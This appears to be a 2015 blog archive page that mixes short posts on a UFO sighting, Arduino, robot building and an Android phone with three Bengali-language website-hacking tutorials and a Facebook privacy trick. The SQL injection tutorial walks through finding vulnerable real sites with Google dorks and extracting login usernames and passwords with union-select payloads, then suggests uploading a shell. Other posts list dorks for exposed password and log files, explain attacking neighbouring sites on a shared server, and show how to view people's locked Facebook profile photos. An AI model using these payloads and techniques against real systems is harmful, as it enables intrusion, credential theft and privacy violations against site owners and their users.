Saturday, January 31, 2015

UFO encounter in Germany, witnesses experience paralysis

Date: March 9, 1993

Location: Braunschweig , Germany

Through the bedroom window, we saw a bright round shining object stationary at a height of some 10 metres or so above the birch trees to the east... it was now immediately quite clear to me that I was looking at an unknown flying object... we could see its shape absolutely clearly."
·   0

Friday, January 30, 2015

Getting Started with Arduino on Windows

is document explains how to connect your Arduino board to the computer and upload your first sketch.
·   0

Thursday, January 29, 2015

Arduino Robot

With the Arduino Robot, you can learn about electronics, mechanics, and software. It is a tiny computer on wheels. It comes with a number of of project examples you can easily replicate, and it is a powerful robotics platform that you can hack to perform all sorts of tasks.
·   3

Wednesday, January 28, 2015

How to make a Robot. Lesson: 1 Getting Started



Getting Started
Welcome to the first installment of the Grand Robotic Tutorial, a series of 10 lessons that will teach you how to make your own robot. This tutorial is aimed at anybody willing to get started in robotics and have a basic understanding of terms such as “voltage”, “current”, “motor”, and “sensors”. Although this might seem pretty basic, even people with previous robot building experience might find useful information regarding the general method of building a robot.
·   0

Friday, January 16, 2015

Symphony Has Released Android One In Bangladesh

After Micromax, Symphony has brought the android one handset in Bangladesh. Some days before, Micromax announced to bring the android one handset in bangldesh. 
·   0

Monday, January 12, 2015

Web Site Hacking : Sql Injection (Union Based)

SQL INJECTION (Union Based SQLi)

সবাই আশা করি ভালো আছেন।
(এই টিউটোরিয়ালটি শুধুমাত্র শিক্ষনীয় উদ্দ্যেশ্যে লেখা হয়েছে)
এখন থেকে আমি SQL INJECTION নিয়ে নিয়মিত ব্লগ লেখার চেষ্টা করবো।
আজকে আমি আপনাদের সাথে বেসিক ইউনিয়ন বেজড SQL INJECTION
কিভাবে করা হয় সেটা দেখাবো।
এবং বিস্তারিত আলোচনা করার চেষ্টা করবো আশা করি ধৈর্য সহকারে পড়বেন।
  • SQL INJECTION কি?
SQL INJECTION  হচ্ছে বর্তমান সময়ের ওয়েবসাইট হ্যাকিং সবচেয়ে জনপ্রিয় এবং
কমন মেথড/পদ্ধতি।
আসলে SQL INJECTION হচ্ছে তেমন কঠিন জিনিস না তবে
এটা ভালোভাবে শিখতে হলে,
এটার পিছনে আপনার অনেক সময় দেওয়া লাগবে।
কিন্তু হ্যাকিং এ নতুন এমন  অনেক Newbiee হ্যাকার মনে করে যে SQL INJECTION কোনো বড ব্যাপার নাহ
কারণ তারা খুব সহজেই বিভিন্ন টুলস(Havij,Sqlmap,Sqlninja) ইত্যাদি ব্যাবহার করে SQL INJECTION  করতে পারে।
কিন্তু SQL INJECTION  এমন একটা জিনিস যেটা সম্পর্কে আপনার সম্পূর্ণ শিখতে হলে অনেক বই শেষ করা লাগবে :)
এর মানে বোঝা গেলো যে শুধুমাত্র টুলস ব্যাবহার করে আপনি অনেক সাইট কিন্তু SQL INJECTION করতে পারবেন।
কিন্তু তার দ্বারা আসলেই কোনো লাভ হবে না।
কারণ আপনি কিছুই শিখতে পারবেন না।
এবং অনেক সময় টুলস দিয়েও SQL INJECTION এর জন্যে দুর্বল/ভুলনারেবল সাইট হ্যাক করতে পারবেন না।
যায় হোক।
  • SQL INJECTION দ্বারা কি কি করতে পারবেন আপনি?
  1. আপনি ডাটাবেসে তথ্য তে এক্সেস নিতে পারবেন।
  2. আপনি ডাটাবেসের তথ্য মোডিফাই করতে পারবেন।
  3. আপনি সাইটের লগইন এরিয়া বাইপাস করতে পারবেন।
  4. আপনি SQL Server হ্যাক করতে পারবেন।
তাহলে শুরু করা যাক।
প্রথমত আমাদের SQL INJECTION এর জন্যে ভুলনারবল সাইট বের করতে হবে।
যদি আপনি হ্যাকার হন,তাহলে আপনি ভালো করেই জানবেন যে সার্চ ইঞ্জিন হলো হ্যাকারদের
সবচেয়ে বেস্ট ফ্রেন্ড।আমরা SQL INJECTION ভুলনারবল সাইট GOOGLE Dork
ব্যাবহার করে বের করতে পারবো।
নিচে আমি কিছু কমন SQL INJECTION Dork দিচ্ছিঃ
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=
Dork আরো অনেক বড বিশাল লিস্ট আছে। পরে কোনো এক সময় শেয়ার করবো।
অথবা আপনি গুগল থেকে সার্চ করে বের করে নিতে পারেন।
এখন আপনি এখান থেকে যেকোনো একটি Dork নিয়ে গুগলে সার্চ দিলে
রেসাল্টে অনেক সাইট দেখতে পাবেন।
সেখান থেকে যেকোনো একটি সাইটে প্রবেশ করুন।
মনে করুন এরকম একটি সাইট পেলেন আপনি (উদাহারণ)
website.com/index.php?id=1
এই ইউআরএল টি অনেক রকমের হতে পারে। তবে আমি উদাহারণের জন্যে এটি দেখালাম।
এখন আমরা টেস্ট করবো সাইটটি SQL INJECTION ভুলনরাবল কিনা।
তার জন্যে আমি সাইটের শেষে এই (') চিহ্নটি দিবো (ব্রাকেটের মাঝখানের চিহ্নটি)
উদাহারণঃ
website.com/index.php?id=1'
এখন যদি সাইটি SQL INJECTION এর জন্যে ভুলনারবল হয় তাহলে
আপনি এরকম কিছু এরর দেখতে পাবেন।
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
অথবা,
Warning: mysql_fetch_array()
অথবা আপনি যদি কোনো রকমের mysql এরর দেখতে পান।
অথবা যদি সেই ওয়েব পেইজ থেকে কোনো ডাটা মিস করে তাহলে বুঝতে হবে
সাইটটি SQL INJECTION ভুলনরাবল।
যদি এসবের কিছু না হয় তাহলে সাইটটি ভুলনারবল নাহ!
অন্য আরেকটি সাইট খুজুন।
এরর পাওয়ার পরে এখন আমাদের কাজ হবে সাইটটি কি এক্সপ্লইটিং করার ।
মানে SQL INJECTION করতে হবে।
আমরা এতক্ষন ভুলনারবল সাইট বের করলাম,এখন আমাদের কাজ হবে সাইটটি থেকে ডাটা
ডাম্প করা বা হ্যাক করা।
এখন আমাদের পরবর্তী পদক্ষেপ হবে এই ডাটাবেসের টেবিলে কলামের সংখ্যা কতো সেটা বের করা।
সেজন্যে আমরা ' চিহ্ন টি order by statement এ পরিবর্তন করবো।
উদাহারণঃ
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--
আমাদের order by এর নাম্বার টি বাডিয়ে যেতে হবে যতক্ষন না আমরা
সাইটটি তে কোনো এরর দেখতে না পায়।
এরর অনেকটা এরকম হতে পারে,
unknown column numbers
অথবা
সাইটের কিছু ডাটা মিস হতে পারে।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=20 order by 1-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 2-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 3-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 10-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 20-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 21-- ERROR সাইটের কনটেন্ট মিস হচ্ছে।
এখন আমারা order by 21 পর্যন্ত আসার পর error দেখতে পেলাম।
কিন্তু order by 20 দিলে কোনো এরর নেই।
তার মানে ডাটাবেসে ২০ টি কলাম আছে।
অনেক সময় order by 1000 দিলেও এরর আসে নাহ।
সে ক্ষেত্রে id / parameter এর শেষে ' চিহ্ন টি দিতে হয়
এবং শেষে একটি + যোগ করতে হয়।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=20' order by 21--+
এখন আমাদের জানা আছে যে এই ডাটাবেসে ২০টি কলাম আছে।
এখন আমাদের কাজ হবে সব কলাম সিলেক্ট করা union select statement ব্যাবহার করে।
select statement টি Data দেখার জন্যে ব্যাবহার করা হয়।
যায় হোক এর পর্যায়ে আমরা এই কোডটি ব্যাবহার করবো।
http://www.exaplme.sqlsite.com/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
এখন আমরা ওয়েব পেইজে কিছু নাম্বার দেখতে পাবো।
নম্বর গুলো ১-২০ এর মধ্যে হবে কারণ আমরা জানি এই সাইটের কলাম ২০ টি।
আর আমরা যে কমান্ডটি ব্যাবহার করেছি সেটা দিয়ে ২০টি কলামের মধ্যে কোনটি
String কলাম সেটা বের করার জন্যে এই কমান্ড টি ব্যাবহার করেছি।
যদি আপনি কোনো নাম্বার দেখতে না পান তাহলে
parameter value এর আগে একটি - চিহ্ন দেন।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
আপনি ওয়েবপেইজে কিছু নাম্বার দেখতে পাবেন।
আমি ৩,৪ দেখতে পেলাম।
এই দুইটা হলো String Column আমরা ডাটাবেস থেকে তথ্য হ্যাক করতে পারবো
এই দুইটি কলাম ব্যাবহার করে।
অনেক সময় উপরে যে কমান্ডটি নিয়ে লেখেছি সেটা কাজ করে নাহ :(
সে ক্ষেত্রে আমরা এরর দেখতে পাবো।
এই ক্ষেত্রে waf bypass করতে হবে।
সেটা সম্পর্কে সামনের টিউটোরিয়াল গুলোতে আলোচনা করবো।
এখন আমাদের কাজ ডাটাবেস থেকে ডাটা হ্যাক করা।
আমরা এখন ডাটাবেসের সংরক্ষিত গোপন ডাটা গুলো হ্যাক করতে পারবো।
এছাডাও আমরা ডাটাবেসের নাম database() এই কমান্ড টি ব্যাবহার করে,
ডাটাবেস ভার্সন জানতে  version() এই কমান্ডটি ব্যাবহার করে বের করতে পারবো।
এছাডাও আমরা SQL INJECTION এর মাধ্যমে লোড ফাইল মেথড ব্যাবহার করে
ভুলনরাবল সাইটে শেল আপলোড দিতে পারবো (এই বিষয়ে পরে টিউটোরিয়াল লেখা হবে)
এই টিউটোরিয়াল টি তে আমরা ডাটাবেস ইউজার নেম এবং ডাটাবেস ভার্সন বের করবো,
৩ এবং ৪ নম্বর String কলাম ব্যাবহার করে।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
আমি এখানে 0x3a ব্যাবহার করেছি এটা হলো সেমিকোলন (;) এর হেক্স ভ্যালু
এটা দুইটা ডিফারেন্ট ভ্যালু কে ডিফারেন্ট প্যারামিটার এ সেপারেট করে দেখাবে।
এখন দেখা যাবে যে ৩ এর ৪ নম্বর ভুলনারবল সাইটের জায়গায় ডাটাবেস ভার্সন এবং
ডাটাবেসের ইউজারের নাম দেখাবে।
এখন আমরা ভুলনারবল সাইটের যে যে ডাটাবেস সেটা বের করবো।
তার জন্যে আমাদের কলাম নেমের জায়গায় SQL QUERY দিয়ে রিপ্লেস করতে হবে।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--
এখন আমরা দুইটা ডাটাবেস দেখতে পাবো
একটি information_schema আরেকটি site_database এটা সাইট এডমিন যে নামে দিয়েছে সে নামে হবে
এখন information_schema নিয়ে আমাদের কোনো কাজ নেই কারণ
কারণ information_schema তে সিস্টেম টেবিল থাকে যা ডাটাবেস কে ডিফাইন করে।
আমরা এই টেবিল গুলো ব্যাবহার করে ডাটাবেসের লে-আউট স্টাইল চেক করতে পারবো।
যায় হোক এইগুলা অনেক এডভান্স লেভেলের কথা বার্তা লোল :p
যা এখন আপনারা বুঝতে পারবেন না।
এখন আমাদের কাছে ডাটাবেস আছে (আসলে আমাদের ডাটাবেসের নাম চেক করার দরকার ছিলো না
আমি শুধু শেখার উদ্দেশ্যে সেই বিষয়ে বললাম।আমরা যদি সাইটের ডাটাবেস থেকে ডাটা হ্যাক করতে চায়
তাহলে আমরা ডাটাবেস ফাংশন ব্যাবহার করেই ডাটা ডাম্প করতে পারি।
সে ক্ষেত্রে site_database এর নাম জানার আর দরকার হবে না।
আমরা এই টিউটোরিয়ালে database() এই ফাংশন টি ব্যাবহার করে ডাটা হ্যাক করবো।)
এখন আমরা ডাটাবেস থেকে টেবিলস বের করবো।
এখন আমরা where কন্ডিশন টি ব্যাবহার করবো এই query তে।
আমরা টেবিলস নেম বের করবো select statement ব্যাবহার করে
এবং where কন্ডিশনটি ব্যাবহার করবো এটা দেখানোর জন্যে কোন ডাটাবেস থেকে আমরা টেবিলস
বের করতে চাচ্ছি।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--
এখন আপনি টেবিলস দেখতে পাবেন।
মনে করেন এই টেবিলস গুলা আমরা পেলাম।
  • archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit
এখন আমাদের দেখতে হবে এই গুলোর মধ্যে সেনসেটিভ টেবিল কোনটা যেখানে গুরুত্বপূর্ণ ডাটা থাকবে ?
সেটা হচ্ছে login টেবিল।
এক এক ক্ষেত্রে এক এক রকম হতে পারে টেবিল নেম। নিজের বুদ্ধি খাটান!
আমরা এখন login টেবিল থেকে ডাটা হ্যাক করবো ।
এখন আমরা group_concat(table_name) কে group_concat(column_name) এবং information_schema.tables কে information_schema.columns
দিয়ে রিপ্লেস করবো এবং table_schema এর জায়গায় table_name ব্যাবহার করবো।
এখন আমারা table_name কে একটি প্যারামিটার দিবো টেবল নেম টি quote এ নিয়ে আসবো
table_name='login'
আমরা qoute কেনো ব্যাবহার করলাম??
কারণ এটার ডাটা টাইপ varchar...
অনেক সময় এই পদ্ধতি টি কাজ করে নাহ...
সে ক্ষেত্রে টেবিল নাম কে char এ রুপান্তর করতে হয়।
এটা করার জন্যে মোজিলা ফায়ার ফক্সে হ্যাকবার নামে একটি এডঅন আছে ওটা এড করে নিন।
সহজের char এ রুপান্তর করতে পারবেন।
আমি login table টাকে char এ রুপান্তর করার পর সেটা হলো
CHAR(108, 111, 103, 105, 110)
এখন আমরা কমান্ডটি ব্যাবহার কিভাবে করে সেটা দেখবো।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--
এখন আমরা login টেবিলের কলাম গুলো দেখতে পাবে
আমি যা যা পেলাম।
id,username,password,email,date_added,lastlogin,sessionid,type,status
এখন আসল কাজ শুরু ।
এখন আমরা কলাম থেকে id এবং password হ্যাক করবো ।
এখন আমরা (username,0x3a,password) এই কমান্ডটি ব্যাবহার করবো
এবং login টেবিল থেকে এই দুইটি কলামের ডাটা বের করবো ।
যার জন্যে কমান্ড হবে।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php
?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--
এখন আপনি username এবং password দেখতে পাবেন।
এখন আপনার কাজ হবে এডমিন প্যানেল বের করে সাইটটা তে শেল আপলোড করে হ্যাক করে ফেলা :D 

ভাল লাগলে আশা করি একটা ধন্যবাদ দিয়ে কমেন্ট করবেন।

·   0

Website hacking: information gathering tutorial part-2 :information gathering using google (bangla)

সবাইকে স্বাগতম ইনফরমেশন গ্যাদারিং নিয়ে লেখা আমার ২য় টিউটোরিয়ালে। আমার আগের টিউটোরিয়াল গুলো যদি না পড়ে থাকেন তাহলে পড়ে নিতে পারেন কাজে দিবে আশা করি।
আজকের টিউটোরিয়ালে আমরা শিখবো কিভাবে আমরা গুগল ব্যাবহার করার মাধ্যমে একটি সাইটের গুরুত্বপূর্ণ ইনফরমেশন বের করতে পারি সেটা।
যা আমাদের সাহায্য করবে সাইটটি হ্যাক করতে বা সাইটের দুর্বলতা বের করতে।
এই জিনিসটিকে গুগল ডরক ও বলা হয়।
প্রথমে আমি দেখাবো এইগুলোর কাজ কি সেটা এবং তারপর দেখাবো কিভাবে ব্যাবহার করতে হয় সেটা।
inurl:- এটা ব্যাবহার করা হয় কোনো নির্দিষ্ট লিঙ্ক খোজার জন্যে, যেমন আপনি যদি গুগলে এটা লেখে সার্চ দেনঃinurl:index.php?id= তাহলে গুগল আপনাকে দেখাবে
গুগলে ইনডেক্সে যত ইউআরএল আছে  "index.php?id=" এই ধরনের সেগুলো। হ্যাকার রা এই ডরক টি ব্যাবহার করে ভুলনরাবল স্ক্রিপ্ট ,প্লাগিন, অথবা গুরুত্বপূর্ণ ওয়েবসাইটের তথ্য বের করতে।
intext:- এই ডরক টি ব্যাবহার করা হয় একটি ওয়েবসাইটের বডি অথবা সোর্স কোড থেকে কোনো ওয়ার্ড সার্চ করার জন্যে।
এটা বেশীর ভাগ সময় ব্যাবহার করা হয় কোনো  ওয়েব এপ্ল্যিকেশনের নির্দিষ্ট ভার্সনের সাইট বের করার জন্যে যেটা হ্যাক করা যাবে।
filetype -
এটা ব্যাবহার করা হয় টার্গেট ওয়েবসাইট থেকে কাঙ্খিত ফরম্যাটের ফাইল বের করার জন্যে। এই ডরক টি ব্যাবহার করে আপনি যেকোনো টাইপের ফাইলের জন্যে সার্চ করতে পারেন।
এটা ব্যাবহার করে টার্গেট সাইট থেকে সেনসেটিভ ইনফরমেশন বের করে সেটা ওয়েবসাইটটি এক্সপ্লইট করতে কাজে লাগায়।
intitle:- এটা ব্যাবহার করা হয় কোনো টাইটেল সার্চ করার জন্যে ওয়েব পেইজের, এই ডরক টি ব্যাবহার করে মুলত ভুলনরাবল পেইজ বা ওয়েবসাইটের ইনডেক্স বের করা হয়।
site -
এটা ব্যাবহার করে কোনো একটি নির্দিষ্ট ওয়েবসাইটের জন্যে ডরক ব্যাবহার করা হয়। এটা দ্বারাও আপনি গুরুত্বপূর্ণ ইনফরমেশন বের করতে পারবেন।
এটার ব্যাপারে আরো বিস্তারিত জানবেন শেষের দিকে যখন এটার ব্যাবহার কিভাবে করা হয় সেটা জানাবো ।
link :-এটা দিয়ে দেখা হয় যে টার্গেট ওয়েবসাইটটির তথ্য আর কোনো ওয়েবসাইটে আছে নাকি। এটা দিয়েও টার্গেট ওয়েবসাইট সম্পর্কিত বিভিন্ন তথ্য পাওয়া যায় । যেটা এক্সপ্লইট করতে কাজে লাগতে পারে সেই
টার্গেটটিকে।
subtract:-  গুগল অনেক সময় অনেক অপ্রজোনীয় রেসাল্ট দেখায় যেটার কোনো দরকার নেই। আপনি যেটা চাচ্ছেন শুধুমাত্র সেটাই দেখার জন্যে এই ডরক টা ব্যাবহার করতে পারেন।
এখন আমি আপনাদের উদাহারণ দেওয়ার চেষ্টা করবো কিভাবে ডরক ব্যাবহার করে আপনি একটি সাইটের সম্পর্কে তথ্য বের করতে পারেন যা আপনাকে সাহায্য করবে সাইটটি হ্যাক করতে।
যদি কোনো সাইটের সাব-ডোমেইন বের করতে চান তাহলে সেটার জন্যে গুগলে সার্চ করুন এভাবেঃ
site:yoursite.com -site:www.yoursite.com
-
যদি টার্গেট সাইটের কোনো ওপেন ইনডেক্স বা insecure directory খুজে বের করতে চান তাহলে এই ডরক টি ব্যাবহার করুন (ভালোভাবে বোঝার জন্যে সার্চ করে দেখুন গুগলে yoursite.com
এর জায়গায় আপনার টার্গেট সাইটের নাম দিবেন)
intitle:"index of /" Parent Directory site:yoursitehere.com
-
এডমিন ডাইরেক্টরি বের করার জন্যে এই ডরক টি ব্যাবহার করতে পারেনঃ
intitle:"Index of /admin" site:yoursitehere.com
-
পাসওয়ার্ড ডাইরেক্টরির জন্যে এই ডরকটিঃ
intitle:"Index of /password" site:yoursitehere.com
-
ই-মেইল ডাইরেক্টরির জন্যে এই ডরক টি ব্যাবহার করতে পারেনঃ
intitle:"Index of /mail" site:yoursitehere.com
-
যদি আপনি পাসওয়ার্ড ফাইলের জন্যে সার্চ করতে চান তাইলে এই ডরক টি ব্যাবহার করতে পারেনঃ
intitle:"Index of /" passwd site:yoursitehere.com
-
passoword.txt এই ধরনের ফাইল খোজার জন্যে এই ডরক টি ব্যাবহার করতে পারেনঃ
intitle:"Index of /" password.txt site:yoursitehere.com
-
htaccess ফাইল বের করার জন্যে এই ডরক টি ব্যাবহার করতে পারেন।
intitle:"Index of /" .htaccess site:yoursitehere.com
-
বিভিন্ন ধরনের এক্সটেনশনের জন্যে সার্চ করার জন্যে এই ডরক টি ব্যাবহার করতে পারেনঃ আমজ .mdb extension এর ফাইল বের করার জন্যে এই ডরক টি ব্যাবহার করলাম:
 intitle:"index of ftp" .mdb site:yoursitehere.com
-
এডমিন পেইজ বা লগিন করার জন্যে কোনো পেইজ বের করতে এই ডরক টি ব্যাবহার করতে পারেনঃ
Intitle: "login" "admin" site:yoursitehere.com
-
InURL  ব্যাবহার করে আমরা একটি ওয়েবসাইট সম্পর্কে বিভিন্ন তথ্য বের করতে পারি গুগল ব্যাবহার করে আর এই ডরক টিই সবচেয়ে বেশী ব্যাবহারিত হয়,
যদি আপনার এই ডরক টা ব্যাবহার করে এডমিন পেইজ বের করতে চান তাহলে সে ক্ষেত্রে ডরক টি হবেঃ
inurl:admin site:yoursitehere.com
-
লগিন পেইজ বের করার জন্যে এই ডরক টি ব্যাবহার করতে পারেনঃ
inurl:login site:yoursitehere.com
-
FileType ব্যাবহার করে আমরা আমাদের টার্গেট ওয়েবসাইটের বিভিন্ন গুরুত্বপূর্ণ ফাইল বের করতে পারি
যদি কোনো টেক্সট ফাইল খুজতে চান যেখানে পাসওয়ার্ড আছে বা এই নামের কোনো ফাইল টেক্সট ফরম্যাটে আছে সাইটটাতে তাইলে ডরক হবেঃ
inurl:passwd filetype:txt site:yoursitehere.com
-
এই ডরক টি ব্যাবহার করে আপনি ডাটাবেইস ফাইল এর জন্যে সার্চ করতে পারবেন যেটার লিঙ্ক হচ্ছে এডমিন পেইজের সাথে সম্পরকিতঃ
inurl:admin filetype:db site:yoursitehere.com
-
সাইটের লগ বের করার জন্যেঃ
filetype:log site:yoursitehere.com
এই লগ ফাইলে অনেক সময় গুরুত্বপূর্ণ তথ্য পাওয়া যেতে পারে।
-
Excel এবং csv ফরম্যাটের ফাইল বের করার জন্যে এই ডরকটি ব্যাবহার করতে পারেনঃ
filetype:xls csv site:yoursitehere.com
-
অন্য যেকোনো ওয়েবসাইটে যেখানে আপনার টার্গেট ওয়েবসাইটের লিঙ্ক ব্যাবহার করা হয়েছে সেই ওয়েবসাইট গুলো বের করতে এই ডরক টি ব্যাবহার করতে পারেনঃ
link:yoursite.com -site:yoursite.com
-
আপনি গুগল ট্রান্সলেট কে প্রক্সির মত ব্যাবহার করেও একটি ওয়েবসাইটে প্রবেশ করতে পারেনঃ
http://translate.google.com/translate?hl=en&sl=ar&tl=en&u=http://www.yoursitehere.com/urlhere
-
আপনি এই ওয়েবসাইটি ব্যাবহার করেঃ shodanhq.comটার্গেট সম্পর্কে বিভিন্ন তথ্য বের করতে পারেন ।
ওয়েবসাইটটির সার্চ বক্সে গিয়ে এইভাবে আপনার ডরক টি ব্যাবহার করুনঃ
hostname:yoursitehere.com dork
Dork লেখা জায়গায় আপনার যে Dork টি ইচ্ছে সেটা দিবেন।
আসলে গুগল হচ্ছে হ্যাকারের সবচেয়ে বড় বন্ধু ।
গুগল ডরক যে শুধুমাত্র এইগুলা তাই কিন্তু না । আপনি যদি এই জিনিস গুলো হালকা পাতলা ভাবে বুঝতে পারেন তাহলে হয়তো আপনি নিজে থেকেও ডরক বানাতে পারবেন :)
পরের পর্ব পড়ার আমন্ত্রন জানিয়ে আজকে আমার টিউটোরিয়াল এখানেই শেষ করছি।
ধন্যবাদ সবাইকে।
বি দ্রঃ দয়া করে কেউ পোস্টটি  কোথাও কপি করে পেস্ট করবেন না। যদি শেয়ার করতে চান লিঙ্ক শেয়ার করুন। যদি কেউ শেয়ার করেন তাহলে সেটাকে চুরি ধরা হবে।
·   0

Website Hacking :information gathering using online website

সবাইকে স্বাগতম, আজকে আমি এই টিউটোরিয়ালে লেখার চেষ্টা করবো কিভাবে অনলাইন বেজড কিছু ওয়েবসাইট ব্যাবহার করে,  টার্গেট সাইট (টার্গেট সাইট বলতে,যে ওয়েবসাইট টি আপনি হ্যাক করতে চান) সেই ওয়েবসাইট সংক্রান্ত গুরুত্বপূর্ণ তথ্য গুলো কিভাবে বের করা যায় সেটা দেখাবো।
আমরা নিচের ওয়েবসাইট গুলো ব্যাবহার করবো এই টিউটোরিয়ালে আমাদের টার্গেট সম্পর্কে তথ্য বের করতে।
সবার শেষে আমরা robots.txt ফাইল টি চেক করবো ওয়েবসাইট প্যাথ বের করতে যা এডমিন বট থেকে হাইড করে রেখেছে যাতে সেটা যার ইচ্ছে সে দেখতে না পারে । robots.txt অনেক গুরুত্বপূর্ণ প্যাথ (path) এর লিঙ্ক পেতে পারেন।
যা স্ক্যানিং এ আমাদের সাহায্য করবে। আমি সাইট গুলো  সম্পর্কে বিস্তারিত দেখাচ্ছি।
1. Netcraft
এই ওয়েবসাইটের মাধ্যমে আমরা ওয়েব হোস্টিং এবং সার্ভারের  বিভিন্ন গুরুত্বপূর্ণ  তথ্য বের করতে পারবো।
এই ওয়েবসাইটের মাধ্যমে দেখা যাবে আপনার টার্গেট সিস্টেম কি ধরনের সার্ভার ব্যাবহার করছে এবং সেটার আইপি এড্রেস ও বের করতে পারবেন এই ওয়েবসাইটটি ব্যাবহার করে। এছাড়াও who is information এবং server slide technologies ইত্যাদি বের করতে পারবেন। যেসব তথ্য আপনি এই সাইট ব্যাবহার করে পাবেন সেগুলো রিপোর্ট আকারে সেইভ করে রাখতে পারেন যা আপনার কাজে লাগবে সাইটটি কে হ্যাক করতে।
2.Yougetsignal
অনেক সময় আপনি যে সাইটটি টার্গেট করবেন হ্যাক করার জন্যে ঐ সাইটটি ভুলনরাবল নাও হতে পারে। এমন অবস্থায় আপনি reverse ip dmoain lookup ব্যাবগার করে এই সার্ভারের অন্য সাইট গুলো বের করতে পারেন । এবং সে সাইট গুলোর মধ্যে যেকোনো একটি সাইট ভুলনরাবল হলে আপনি সেই সাইটটি হ্যাক করে আপনার টার্গেট সাইট যে সার্ভারে আছে সেই সার্ভারে এক্সেস নিতে পারেন যেটা আপনাকে সাহায্য করবে আপনার টার্গেট সাইট হ্যাক করার ক্ষেত্রে।
এই সাইটটি অনলাইনের অনেক ওয়েবসাইটের হিস্টোরি মেইন্টেইন করে থাকে। অনেক সময় এই ওয়েবসাইট থেকে আপনি আপনার টার্গেট করা ওয়েবসাইটের এমন সব ইনফরমেশন পেতে পারেন যা হয়তো আপনার টার্গেট ওয়েবসাটে আর দেখাচ্ছে না সিকিউরিটি ইস্যুর কারণে মানে তারা তথ্য গুলো সরিয়ে ফেলেছে যাতে তথ্য গুলো ব্যাবহার করে কেউ যেন তাদের ওয়েবসাইটের ক্ষতি না করতে পারে।
4.Robots.txt 
robotx.txt এমন একটি ফাইল যেটা ব্যাবহার করে ওয়েব এডমিন তার ওয়েবসাইটের গুরুত্বপূর্ণ পেইজ গুলো যেমন admin page
Disallow করে রাখে যাতে কোনো Crawler দিয়ে সাইটটি স্ক্যান করার সময় এইসব গুরুত্বপূর্ণ পেইজ গুলো crawler এ ধরা না পড়ে যায়। কিন্তু আসল সমস্যা হচ্ছে এই robotx.txt যে কেউ দেখতে পারে। এই পেইজ টা দেখলেই বোঝা যায় যে কোন কোন পেইজ গুলো এডমিন হাইড করে রেখেছে । এই ফাইলটির মধ্যে আপনি অনেক গুরুত্বপূর্ণ ইনফরমেশন পেতে পারেন যা আপনার টার্গেট ওয়েবসাইট কে হ্যাক করতে আপনাকে সাহায্য করবে। কারণ এই প্যাথ বা পেইজ গুলো এডমিন এই কারণেই লুকিয়ে রেখেছে কারণ এতে অনেক গুরুত্বপূর্ণ পেইজ আছে।
ধন্যবাদ টিউটোরিয়াল টি পড়ার জন্যে,ভালো লেগে থাকলে কমেন্ট করুন যদি ভালো নাও লেগে থাকে তাহলে জানান। ধন্যবাদ ।
·   0

Thursday, January 1, 2015

How To Open or View Facebook LockedProfile Picture - 2015


Providing best privacy as much as they can. But some of the little bit bugs and other privacy issues always remains same. Facebook has no ways to make them secure just because these bugs can be directly accessible for database. Some bugs are also present which cannot be fixed from huge time just like of Making Single Name Account. So Today I am going to discuss another amazing Facebook trick related to Profile picture and by using this trick you can easily open an locked profile picture with simple and easy way. Actually this not an hack or even you are not breaking any kind of Privacy. In this method you are directly making some changes which helps you to access that profile photo which is present in Database in actual size.

Step To See Locked Profile Photo on Facebook
 
  • First of all you need a Username or Profile ID of person whom profile picture you want to see.


  • Just copy the Username and Profile ID in notepad or anywhere.Then replace the Paste-username-here from the below given link with the Username or profile ID.

https://graph.facebook.com/Paste-username-here/picture?width=800

  • Then it will looks like as below. 

https://graph.facebook.com/BDBSX/picture?width=800

  • Now to copy link and paste them into new tab of browser.Press enter and see magic.



I hope you like this trick and if you enjoy this trick don't forget to share it with others. For any kind help regarding to post must leave your comment.
·   0